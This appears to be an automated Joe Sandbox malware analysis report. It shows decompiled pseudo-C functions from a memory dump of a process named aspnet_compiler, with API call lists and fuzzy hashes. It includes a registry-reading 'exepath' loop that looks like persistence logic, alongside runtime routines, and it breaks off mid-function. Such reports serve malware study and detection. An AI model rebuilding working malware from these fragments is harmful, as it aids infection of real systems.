                    				void* _t23;
                    				void* _t31;
                    				signed int _t55;
                    				void* _t57;
                    
                    				_t57 = (_t55 & 0xfffffff8) - 0x208;
                    				_t31 = 0x473220;
                    				_t6 = E00406E3A(0x46a8f0);
                    				_t53 = "exepath";
                    				if(_t6 == 0) {
                    					goto L8;
                    				} else {
                    					E00435760(0x46a8f0,  &_v524, 0, 0x208);
                    					_t19 = E0040245C();
                    					_t20 = E00401F8B(0x473280);
                    					_t44 = E00401F8B(0x473238);
                    					_t23 = E004129E0(_t22, "exepath",  &_v524, 0x410, _t20, _t19);
                    					_t57 = _t57 + 0x20;
                    					if(_t23 != 0) {
                    						L004086CB(0x473280, 0x473220, _t44,  &_v524);
                    					}
                    					_t31 = 0x473220;
                    					if(E00406E3A(0x46a8f0) == 0) {
                    						while(1) {
                    							L8:
                    							__eflags =  *0x470d60;
                    							if( *0x470d60 == 0) {
                    								break;
                    							}
                    							Sleep(0xbb8);
                    							__eflags =  *0x470b32;
                    							if( *0x470b32 != 0) {
                    								_push(E00401EE4(0x473208));
                    								E0040C21B(0x473208);
                    								_pop(_t31);
                    							}
                    							_push(_t31);
                    							_t7 = E0040245C();
                    							_t8 = E00401F8B(0x473280);
                    							_t9 = E0040245C();
                    							_t11 = E00401EE4(0x473220);
                    							_t31 = 0x473238;
                    							E00412C2F(E00401F8B(0x473238), __eflags, _t53, _t11, 2 + _t9 * 2, _t8, _t7);
                    							_t57 = _t57 + 0x18;
                    						}
                    						_t16 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t16 = 1;
                    					}
                    				}
                    				return _t16;
                    			}



















                    APIs
                      • Part of subcall function 004129E0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                      • Part of subcall function 004129E0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                      • Part of subcall function 004129E0: RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    • Sleep.KERNEL32(00000BB8), ref: 00411CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQuerySleepValue
                    • String ID: 2G$82G$82G$exepath
                    • API String ID: 4119054056-3664068176
                    • Opcode ID: f57c8dd622f87a1154279fcf81cc6f9dccd49157269dcb42feaca89e4549597b
                    • Instruction ID: 1bc3c23f432ba4f57a41c102a15aec319e0c21ae64d144f38269a80ff3ae14c8
                    • Opcode Fuzzy Hash: f57c8dd622f87a1154279fcf81cc6f9dccd49157269dcb42feaca89e4549597b
                    • Instruction Fuzzy Hash: 5021F4A0B0030427D600B76A6C46ABF228E8B80308F00497FB946E72D3EF3C9D4641AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0044DBDA() {
                    				int _v8;
                    				void* __ecx;
                    				void* _t6;
                    				int _t7;
                    				char* _t13;
                    				int _t17;
                    				void* _t19;
                    				char* _t25;
                    				WCHAR* _t27;
                    
                    				_t27 = GetEnvironmentStringsW();
                    				if(_t27 == 0) {
                    					L7:
                    					_t13 = 0;
                    				} else {
                    					_t6 = E0044DBA3(_t27);
                    					_pop(_t19);
                    					_t17 = _t6 - _t27 >> 1;
                    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                    					_v8 = _t7;
                    					if(_t7 == 0) {
                    						goto L7;
                    					} else {
                    						_t25 = E00444A38(_t19, _t7);
                    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                    							_t13 = 0;
                    						} else {
                    							_t13 = _t25;
                    							_t25 = 0;
                    						}
                    						E00445002(_t25);
                    					}
                    				}
                    				if(_t27 != 0) {
                    					FreeEnvironmentStringsW(_t27);
                    				}
                    				return _t13;
                    			}













                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044DBE3
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044DC06
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044DC2C
                    • _free.LIBCMT ref: 0044DC3F
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DC4E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 05963b722a187b08b23702ed25f32100ad8df03e6f93360e21280f476eebae31
                    • Instruction ID: d30a67c417177e80d80b31b0a31e6726aa7580f18a7a9fd153e391297dd7151b
                    • Opcode Fuzzy Hash: 05963b722a187b08b23702ed25f32100ad8df03e6f93360e21280f476eebae31
                    • Instruction Fuzzy Hash: 38017172A057157F37211AA66D89C7F7A6DDAC2B65315017EF904D2341DEA88C02C1B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041AD6A(long __edx, WCHAR* _a4, long _a8) {
                    				long _v4;
                    				long _t8;
                    				long _t9;
                    				struct _OVERLAPPED* _t19;
                    				void* _t20;
                    				long _t21;
                    				long _t23;
                    				void* _t24;
                    				void* _t25;
                    
                    				_t19 = 0;
                    				_t25 = _t20;
                    				_t23 = __edx;
                    				_t8 = _a8;
                    				if(_t8 == 0) {
                    					_t9 = 0x40000000;
                    					_t21 = 2;
                    				} else {
                    					if(_t8 != 1) {
                    						_t9 = _a8;
                    						_t21 = _a8;
                    					} else {
                    						_t9 = 4;
                    						_t21 = _t9;
                    					}
                    				}
                    				_t24 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19);
                    				if(_t24 != 0xffffffff) {
                    					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
                    						if(WriteFile(_t24, _t25, _t23,  &_v4, _t19) != 0) {
                    							_t19 = 1;
                    						}
                    						CloseHandle(_t24);
                    						return _t19;
                    					} else {
                    						CloseHandle(_t24);
                    						goto L6;
                    					}
                    				} else {
                    					L6:
                    					return 0;
                    				}
                    			}













                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00409E5A,?,00000000,00000000), ref: 0041ADC6
                    • CloseHandle.KERNEL32(00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADD2
                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADE3
                    • CloseHandle.KERNEL32(00000000,?,00409E5A,?,00000000,00000000), ref: 0041ADF0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID:
                    • API String ID: 1852769593-0
                    • Opcode ID: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                    • Instruction ID: 53714e6fa216203b7318fdbd75d04b9937c0d47cb555b8ec8e0bf6eb367397e8
                    • Opcode Fuzzy Hash: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                    • Instruction Fuzzy Hash: CE110871206A117FE6104A24BC88EFB779EEB42367F10463AF552C26D0C634CC86563F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00446B19(void* __ecx) {
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    				long _t16;
                    
                    				_t11 = __ecx;
                    				_t16 = GetLastError();
                    				_t10 = 0;
                    				_t2 =  *0x46f1dc; // 0x6
                    				_t19 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t15 = E004443F4(_t11, 1, 0x364);
                    					_pop(_t13);
                    					if(_t15 != 0) {
                    						_t4 = E00447092(_t13, _t16, __eflags,  *0x46f1dc, _t15);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E00446907(_t13, _t15, 0x470664);
                    							E00445002(_t10);
                    							__eflags = _t15;
                    							if(_t15 != 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t15);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t10);
                    						L4:
                    						E00445002();
                    						L8:
                    						SetLastError(_t16);
                    					}
                    				} else {
                    					_t15 = E0044703C(_t11, _t16, _t19, _t2);
                    					if(_t15 != 0) {
                    						L9:
                    						SetLastError(_t16);
                    						_t10 = _t15;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				return _t10;
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00446B1E
                    • _free.LIBCMT ref: 00446B53
                    • _free.LIBCMT ref: 00446B7A
                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B87
                    • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B90
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                    • Instruction ID: 0346a1b294bc514b0a994de80f7e6f12b46350d74b5091e52828a709d6f7ce0e
                    • Opcode Fuzzy Hash: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                    • Instruction Fuzzy Hash: B6012676205B506BB7112629BC45D6F2269CBD37B9722003BF409D32C2EE7CDC06416F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044F23C(intOrPtr* _a4) {
                    				intOrPtr _t6;
                    				intOrPtr* _t21;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t21 = _a4;
                    				if(_t21 != 0) {
                    					_t23 =  *_t21 -  *0x46f188; // 0x46f180
                    					if(_t23 != 0) {
                    						E00445002(_t7);
                    					}
                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46f18c; // 0x47065c
                    					if(_t24 != 0) {
                    						E00445002(_t8);
                    					}
                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46f190; // 0x47065c
                    					if(_t25 != 0) {
                    						E00445002(_t9);
                    					}
                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46f1b8; // 0x46f184
                    					if(_t26 != 0) {
                    						E00445002(_t10);
                    					}
                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                    					_t27 = _t6 -  *0x46f1bc; // 0x470660
                    					if(_t27 != 0) {
                    						return E00445002(_t6);
                    					}
                    				}
                    				return _t6;
                    			}

                    APIs
                    • _free.LIBCMT ref: 0044F254
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044F266
                    • _free.LIBCMT ref: 0044F278
                    • _free.LIBCMT ref: 0044F28A
                    • _free.LIBCMT ref: 0044F29C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                    • Instruction ID: f954284d0b45cb36624272f64f50ef8c725a3c78d63bb55929d804f861096251
                    • Opcode Fuzzy Hash: 516e47d2e0f60d5fede89190a792db0aa6a45a74a38a5f68d9a0fd3effe540a6
                    • Instruction Fuzzy Hash: A3F09676504601EBEA30EB69F983C4B73D9BA05B54354487BF048D7641C7B9FC844AAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00442968(signed int __ecx) {
                    				intOrPtr _t7;
                    
                    				asm("lock xadd [eax], ecx");
                    				if((__ecx | 0xffffffff) == 0) {
                    					_t7 =  *0x46f9a0; // 0xeda200
                    					if(_t7 != 0x46f780) {
                    						E00445002(_t7);
                    						 *0x46f9a0 = 0x46f780;
                    					}
                    				}
                    				E00445002( *0x470a18);
                    				 *0x470a18 = 0;
                    				E00445002( *0x470a1c);
                    				 *0x470a1c = 0;
                    				E00445002( *0x470a48);
                    				 *0x470a48 = 0;
                    				E00445002( *0x470a4c);
                    				 *0x470a4c = 0;
                    				return 1;
                    			}

                    APIs
                    • _free.LIBCMT ref: 00442986
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 00442998
                    • _free.LIBCMT ref: 004429AB
                    • _free.LIBCMT ref: 004429BC
                    • _free.LIBCMT ref: 004429CD
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                    • Instruction ID: ac8127230bc54366d86f294ef586a91d245084804c15bedb181f71e342f475e2
                    • Opcode Fuzzy Hash: 93600525103f6331525761e29ceec305afa513f2dd5993403a2e8bdf270ab536
                    • Instruction Fuzzy Hash: 30F0D0B9902721DBDB51AF19FC428093760A724B24781913BF45C56B71D77909858FCE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0044CF69(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                    				intOrPtr _v0;
                    				char _v6;
                    				char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v36;
                    				intOrPtr* _v64;
                    				intOrPtr _v96;
                    				intOrPtr* _v100;
                    				CHAR* _v104;
                    				signed int _v116;
                    				char _v290;
                    				signed int _v291;
                    				struct _WIN32_FIND_DATAA _v336;
                    				union _FINDEX_INFO_LEVELS _v340;
                    				signed int _v344;
                    				signed int _v348;
                    				intOrPtr _v440;
                    				intOrPtr* _t80;
                    				signed int _t82;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t93;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t108;
                    				signed int _t111;
                    				intOrPtr _t113;
                    				signed char _t115;
                    				union _FINDEX_INFO_LEVELS _t123;
                    				signed int _t128;
                    				signed int _t131;
                    				void* _t137;
                    				void* _t139;
                    				signed int _t140;
                    				signed int _t143;
                    				signed int _t145;
                    				signed int _t147;
                    				signed int* _t148;
                    				signed int _t151;
                    				void* _t154;
                    				CHAR* _t155;
                    				char _t158;
                    				char _t160;
                    				intOrPtr* _t163;
                    				void* _t164;
                    				intOrPtr* _t165;
                    				signed int _t167;
                    				void* _t169;
                    				intOrPtr* _t170;
                    				signed int _t174;
                    				signed int _t178;
                    				signed int _t179;
                    				intOrPtr* _t184;
                    				void* _t193;
                    				intOrPtr _t194;
                    				signed int _t196;
                    				signed int _t197;
                    				signed int _t199;
                    				signed int _t200;
                    				signed int _t202;
                    				union _FINDEX_INFO_LEVELS _t203;
                    				signed int _t208;
                    				signed int _t210;
                    				signed int _t211;
                    				void* _t213;
                    				intOrPtr _t214;
                    				void* _t215;
                    				signed int _t219;
                    				void* _t221;
                    				signed int _t222;
                    				void* _t223;
                    				void* _t224;
                    				void* _t225;
                    				signed int _t226;
                    				void* _t227;
                    				void* _t228;
                    
                    				_t80 = _a8;
                    				_t224 = _t223 - 0x20;
                    				if(_t80 != 0) {
                    					_t208 = _a4;
                    					_t160 = 0;
                    					 *_t80 = 0;
                    					_t199 = 0;
                    					_t151 = 0;
                    					_v36 = 0;
                    					_v336.cAlternateFileName = 0;
                    					_v28 = 0;
                    					__eflags =  *_t208;
                    					if( *_t208 == 0) {
                    						L9:
                    						_v12 = _v12 & 0x00000000;
                    						_t82 = _t151 - _t199;
                    						_v8 = _t160;
                    						_t191 = (_t82 >> 2) + 1;
                    						__eflags = _t151 - _t199;
                    						_v16 = (_t82 >> 2) + 1;
                    						asm("sbb esi, esi");
                    						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                    						__eflags = _t210;
                    						if(_t210 != 0) {
                    							_t197 = _t199;
                    							_t158 = _t160;
                    							do {
                    								_t184 =  *_t197;
                    								_t17 = _t184 + 1; // 0x1
                    								_v8 = _t17;
                    								do {
                    									_t143 =  *_t184;
                    									_t184 = _t184 + 1;
                    									__eflags = _t143;
                    								} while (_t143 != 0);
                    								_t158 = _t158 + 1 + _t184 - _v8;
                    								_t197 = _t197 + 4;
                    								_t145 = _v12 + 1;
                    								_v12 = _t145;
                    								__eflags = _t145 - _t210;
                    							} while (_t145 != _t210);
                    							_t191 = _v16;
                    							_v8 = _t158;
                    							_t151 = _v336.cAlternateFileName;
                    						}
                    						_t211 = E00441F9E(_t191, _v8, 1);
                    						_t225 = _t224 + 0xc;
                    						__eflags = _t211;
                    						if(_t211 != 0) {
                    							_t87 = _t211 + _v16 * 4;
                    							_v20 = _t87;
                    							_t192 = _t87;
                    							_v16 = _t87;
                    							__eflags = _t199 - _t151;
                    							if(_t199 == _t151) {
                    								L23:
                    								_t200 = 0;
                    								__eflags = 0;
                    								 *_a8 = _t211;
                    								goto L24;
                    							} else {
                    								_t93 = _t211 - _t199;
                    								__eflags = _t93;
                    								_v24 = _t93;
                    								do {
                    									_t163 =  *_t199;
                    									_v12 = _t163 + 1;
                    									do {
                    										_t95 =  *_t163;
                    										_t163 = _t163 + 1;
                    										__eflags = _t95;
                    									} while (_t95 != 0);
                    									_t164 = _t163 - _v12;
                    									_t35 = _t164 + 1; // 0x1
                    									_t96 = _t35;
                    									_push(_t96);
                    									_v12 = _t96;
                    									_t100 = E00440303(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                    									_t225 = _t225 + 0x10;
                    									__eflags = _t100;
                    									if(_t100 != 0) {
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										E0043A5E8();
                    										asm("int3");
                    										_t221 = _t225;
                    										_push(_t164);
                    										_t165 = _v64;
                    										_t47 = _t165 + 1; // 0x1
                    										_t193 = _t47;
                    										do {
                    											_t103 =  *_t165;
                    											_t165 = _t165 + 1;
                    											__eflags = _t103;
                    										} while (_t103 != 0);
                    										_push(_t199);
                    										_t202 = _a8;
                    										_t167 = _t165 - _t193 + 1;
                    										_v12 = _t167;
                    										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                    										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                    											_push(_t151);
                    											_t50 = _t202 + 1; // 0x1
                    											_t154 = _t50 + _t167;
                    											_t213 = E004443F4(_t167, _t154, 1);
                    											_t169 = _t211;
                    											__eflags = _t202;
                    											if(_t202 == 0) {
                    												L34:
                    												_push(_v12);
                    												_t154 = _t154 - _t202;
                    												_t108 = E00440303(_t169, _t213 + _t202, _t154, _v0);
                    												_t226 = _t225 + 0x10;
                    												__eflags = _t108;
                    												if(__eflags != 0) {
                    													goto L37;
                    												} else {
                    													_t137 = E0044D338(_a12, __eflags, _t213);
                    													E00445002(0);
                    													_t139 = _t137;
                    													goto L36;
                    												}
                    											} else {
                    												_push(_t202);
                    												_t140 = E00440303(_t169, _t213, _t154, _a4);
                    												_t226 = _t225 + 0x10;
                    												__eflags = _t140;
                    												if(_t140 != 0) {
                    													L37:
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													E0043A5E8();
                    													asm("int3");
                    													_push(_t221);
                    													_t222 = _t226;
                    													_t227 = _t226 - 0x150;
                    													_t111 =  *0x46f00c; // 0x54ba778e
                    													_v116 = _t111 ^ _t222;
                    													_t170 = _v100;
                    													_push(_t154);
                    													_t155 = _v104;
                    													_push(_t213);
                    													_t214 = _v96;
                    													_push(_t202);
                    													_v440 = _t214;
                    													while(1) {
                    														__eflags = _t170 - _t155;
                    														if(_t170 == _t155) {
                    															break;
                    														}
                    														_t113 =  *_t170;
                    														__eflags = _t113 - 0x2f;
                    														if(_t113 != 0x2f) {
                    															__eflags = _t113 - 0x5c;
                    															if(_t113 != 0x5c) {
                    																__eflags = _t113 - 0x3a;
                    																if(_t113 != 0x3a) {
                    																	_t170 = E00454B80(_t155, _t170);
                    																	continue;
                    																}
                    															}
                    														}
                    														break;
                    													}
                    													_t194 =  *_t170;
                    													__eflags = _t194 - 0x3a;
                    													if(_t194 != 0x3a) {
                    														L47:
                    														_t203 = 0;
                    														__eflags = _t194 - 0x2f;
                    														if(_t194 == 0x2f) {
                    															L51:
                    															_t115 = 1;
                    															__eflags = 1;
                    														} else {
                    															__eflags = _t194 - 0x5c;
                    															if(_t194 == 0x5c) {
                    																goto L51;
                    															} else {
                    																__eflags = _t194 - 0x3a;
                    																if(_t194 == 0x3a) {
                    																	goto L51;
                    																} else {
                    																	_t115 = 0;
                    																}
                    															}
                    														}
                    														asm("sbb eax, eax");
                    														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                    														E00435760(_t203,  &_v336, _t203, 0x140);
                    														_t228 = _t227 + 0xc;
                    														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                    														_t123 = _v340;
                    														__eflags = _t215 - 0xffffffff;
                    														if(_t215 != 0xffffffff) {
                    															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                    															__eflags = _t174;
                    															_v348 = _t174 >> 2;
                    															do {
                    																__eflags = _v336.cFileName - 0x2e;
                    																if(_v336.cFileName != 0x2e) {
                    																	L64:
                    																	_push(_t123);
                    																	_push(_v344);
                    																	_t123 =  &(_v336.cFileName);
                    																	_push(_t155);
                    																	_push(_t123);
                    																	L28();
                    																	_t228 = _t228 + 0x10;
                    																	__eflags = _t123;
                    																	if(_t123 != 0) {
                    																		goto L54;
                    																	} else {
                    																		goto L65;
                    																	}
                    																} else {
                    																	_t178 = _v291;
                    																	__eflags = _t178;
                    																	if(_t178 == 0) {
                    																		goto L65;
                    																	} else {
                    																		__eflags = _t178 - 0x2e;
                    																		if(_t178 != 0x2e) {
                    																			goto L64;
                    																		} else {
                    																			__eflags = _v290;
                    																			if(_v290 == 0) {
                    																				goto L65;
                    																			} else {
                    																				goto L64;
                    																			}
                    																		}
                    																	}
                    																}
                    																goto L58;
                    																L65:
                    																_t128 = FindNextFileA(_t215,  &_v336);
                    																__eflags = _t128;
                    																_t123 = _v340;
                    															} while (_t128 != 0);
                    															_t195 =  *_t123;
                    															_t179 = _v348;
                    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                    															__eflags = _t179 - _t131;
                    															if(_t179 != _t131) {
                    																E0043F8D0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044CF51);
                    															}
                    														} else {
                    															_push(_t123);
                    															_push(_t203);
                    															_push(_t203);
                    															_push(_t155);
                    															L28();
                    															L54:
                    															_t203 = _t123;
                    														}
                    														__eflags = _t215 - 0xffffffff;
                    														if(_t215 != 0xffffffff) {
                    															FindClose(_t215);
                    														}
                    													} else {
                    														__eflags = _t170 -  &(_t155[1]);
                    														if(_t170 ==  &(_t155[1])) {
                    															goto L47;
                    														} else {
                    															_push(_t214);
                    															_push(0);
                    															_push(0);
                    															_push(_t155);
                    															L28();
                    														}
                    													}
                    													L58:
                    													__eflags = _v16 ^ _t222;
                    													return E004338BB(_v16 ^ _t222);
                    												} else {
                    													goto L34;
                    												}
                    											}
                    										} else {
                    											_t139 = 0xc;
                    											L36:
                    											return _t139;
                    										}
                    									} else {
                    										goto L22;
                    									}
                    									goto L68;
                    									L22:
                    									_t196 = _v16;
                    									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                    									_t199 = _t199 + 4;
                    									_t192 = _t196 + _v12;
                    									_v16 = _t196 + _v12;
                    									__eflags = _t199 - _t151;
                    								} while (_t199 != _t151);
                    								goto L23;
                    							}
                    						} else {
                    							_t200 = _t199 | 0xffffffff;
                    							L24:
                    							E00445002(0);
                    							goto L25;
                    						}
                    					} else {
                    						while(1) {
                    							_v8 = 0x3f2a;
                    							_v6 = _t160;
                    							_t147 = E00454B40( *_t208,  &_v8);
                    							__eflags = _t147;
                    							if(_t147 != 0) {
                    								_push( &_v36);
                    								_push(_t147);
                    								_push( *_t208);
                    								L38();
                    								_t224 = _t224 + 0xc;
                    							} else {
                    								_t147 =  &_v36;
                    								_push(_t147);
                    								_push(0);
                    								_push(0);
                    								_push( *_t208);
                    								L28();
                    								_t224 = _t224 + 0x10;
                    							}
                    							_t200 = _t147;
                    							__eflags = _t200;
                    							if(_t200 != 0) {
                    								break;
                    							}
                    							_t208 = _t208 + 4;
                    							_t160 = 0;
                    							__eflags =  *_t208;
                    							if( *_t208 != 0) {
                    								continue;
                    							} else {
                    								_t151 = _v336.cAlternateFileName;
                    								_t199 = _v36;
                    								goto L9;
                    							}
                    							goto L68;
                    						}
                    						L25:
                    						E0044D313( &_v36);
                    						_t91 = _t200;
                    						goto L26;
                    					}
                    				} else {
                    					_t148 = E0043EEAD();
                    					_t219 = 0x16;
                    					 *_t148 = _t219;
                    					E0043A5BB();
                    					_t91 = _t219;
                    					L26:
                    					return _t91;
                    				}
                    				L68:
                    			}


                    APIs
                    • _strpbrk.LIBCMT ref: 0044CFB8
                    • _free.LIBCMT ref: 0044D0D5
                      • Part of subcall function 0043A5E8: IsProcessorFeaturePresent.KERNEL32(00000017,0043A5BA,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000), ref: 0043A5EA
                      • Part of subcall function 0043A5E8: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 0043A60C
                      • Part of subcall function 0043A5E8: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 0043A613
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                    • Instruction ID: 0665d5b14a1e4b9cb67c1a99571701ed5e9b0677a739cf7a3229819190da0774
                    • Opcode Fuzzy Hash: 4f99e93415464d5738f8b0ec0c1dd26b56c598080a7d5787abd8bcea82267666
                    • Instruction Fuzzy Hash: 88518271E00109AFEF14DFA9C881AAEF7B5EF48318F24416FE854E7341D6799E068B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004165EC(void* __edi, struct HWND__* _a4) {
                    				short _v604;
                    				char _v632;
                    				void* _v636;
                    				char _v656;
                    				void* _v660;
                    				char _v680;
                    				void* _v684;
                    				char _v704;
                    				void* _v708;
                    				char _v728;
                    				void* _v732;
                    				char _v752;
                    				void* _v756;
                    				char _v776;
                    				void* _v780;
                    				char _v800;
                    				void* _v804;
                    				char _v824;
                    				void* _v828;
                    				char _v848;
                    				void* _v852;
                    				char _v872;
                    				void* _v876;
                    				char _v896;
                    				void* _v900;
                    				char _v920;
                    				void* _v924;
                    				char _v940;
                    				char _v944;
                    				void* _v948;
                    				char _v964;
                    				char _v968;
                    				void* _v972;
                    				char _v988;
                    				long _v992;
                    				intOrPtr _v996;
